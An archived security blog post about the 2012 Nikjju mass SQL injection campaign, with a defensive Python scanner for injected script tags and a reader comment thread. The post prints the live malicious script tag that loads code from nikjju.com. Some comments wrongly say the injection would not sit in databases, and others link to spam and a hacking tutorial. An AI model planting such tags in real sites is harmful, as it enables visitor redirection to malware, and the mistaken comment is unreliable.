
Sucuri Blog

Nikjju Mass injection campaign (180k+ pages compromised)

April 17, 2012 · Daniel Cid

Our research team has been tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them.

Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to LizaMoon from last year). When successful, it adds the following JavaScript to the compromised sites:

<script src= http://nikjju.com/r.php ></script>


This is used to redirect anyone visiting the infected websites to Fake/Rogue AVs (best-antiviruu.de.lv – mostly targeting Windows users). All the sites we analysed so far are Windows-based servers running ASP/ASP.net compromised via SQL injection.

Google

So far Google has identified 188,000 pages infected with that JavaScript call, but the number is growing really fast. It was less than 130,000 yesterday afternoon.

Another interesting thing is that if you move up the Google results pages, you’ll get “Page 4 of about 457,000 results (0.21 seconds)”. It is likely that the number is even higher than our estimated 180k pages.

Nikjju.com

The domain Nikjju.com (31.210.100.242) was registered April 1st and we started to see the first batch of compromised sites a few days after (April 4th).

Updated Date: 01-apr-2012
Creation Date: 01-apr-2012

To Webmasters

If you suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner).

You will also need to audit your code to make sure that any user input is sanitized before use.
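As an added example (not part of the original post or Sucuri's tooling), the following sketch audits exported content for script tags that load from hosts outside an allowlist, including the unquoted, space-padded `src=` form shown above. The row layout, table and column names, and the allowlisted hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# <script ... src=VALUE ...></script>; VALUE may be quoted, bare, or padded with
# spaces as in the tag shown above: <script src= http://nikjju.com/r.php ></script>
SCRIPT_TAG = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\"'\s>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

def find_foreign_scripts(value, allowed_hosts):
    """Return [(host, tag_text)] for script tags loading from non-allowed hosts."""
    hits = []
    for m in SCRIPT_TAG.finditer(value):
        # hostname is None for relative (same-site) paths such as /js/app.js
        host = urlparse(m.group(1)).hostname
        if host and host not in allowed_hosts:
            hits.append((host, m.group(0)))
    return hits

def audit_rows(rows, allowed_hosts):
    """rows: iterable of (table, column, key, value); returns one dict per hit."""
    findings = []
    for table, column, key, value in rows:
        for host, tag in find_foreign_scripts(value or "", allowed_hosts):
            findings.append({"table": table, "column": column,
                             "key": key, "host": host, "tag": tag})
    return findings

def strip_foreign_scripts(value, allowed_hosts):
    """Remove only the flagged tags, leaving the rest of the field intact."""
    for _, tag in find_foreign_scripts(value, allowed_hosts):
        value = value.replace(tag, "")
    return value

# Constructed sample data: hosts, table and column names are hypothetical.
ALLOWED = {"www.example.org", "cdn.example.org"}
SAMPLE_ROWS = [
    ("news", "title", 1, "Spring sale<script src= http://nikjju.com/r.php ></script>"),
    ("news", "body", 1, '<p>Hi</p><script src="https://cdn.example.org/app.js"></script>'),
    ("news", "body", 2, '<script src="/js/local.js"></script>Plain text'),
    ("users", "bio", 7, None),
]

if __name__ == "__main__":
    for finding in audit_rows(SAMPLE_ROWS, ALLOWED):
        print(finding)
```

Removing the tag only cleans up the symptom; the injectable query that let it in still has to be found and parameterized, or the content will be modified again.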

.Govs

We are seeing a few small .gov sites compromised as well (mostly from China).

More details to follow.


Categories: Website Malware Infections

Tags: Hacked Websites, Malware Updates, Server Security

About Daniel Cid

Daniel B. Cid is currently the VP of Engineering at GoDaddy, as well as Founder & CTO of Sucuri and the open source project, OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research, and secure development. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. prestoniscrazy

    April 17, 2012

    Can I search my database for: “http:// nikjju. com/r.php” and it will come up?

    • Juuso

      April 17, 2012

      No, you would already know if your site would be compromised, since then it would redirect itself to some spam site.

      I don’t believe that they would add such rogue links into databases, since it would not have any outer effect to the site.

      • Imcarthi

        April 23, 2012

         did you find that virus

  2. Jorge Cordova

    April 19, 2012

    Interesting, but most attacks are in Asia and Europe.

  3. song jia

    May 7, 2012

    This is very educational content and written well for a change. It’s nice to see some people still understand how to produce a quality post!  http://www.cheapbeatsearphones.com/

  4. Michelle Ruse

    July 19, 2012

    So, this looks like an XSS attack stored via an SQL injection vulnerability. I wonder why it’s not called a mass XSS attack? 

  5. Vishwas Soni

    September 27, 2012

    For sql-Injection step by step tutorial…..
    http://freaktrickz.wordpress.com/2012/09/27/sql-injection-tutorial-website-hacking/

  6. Vishwas Soni

    October 29, 2012

    Just check it out the article on sql-injection-tutorial-website-hacking
    http://freaktrickz.wordpress.com/2012/09/27/sql-injection-tutorial-website-hacking/
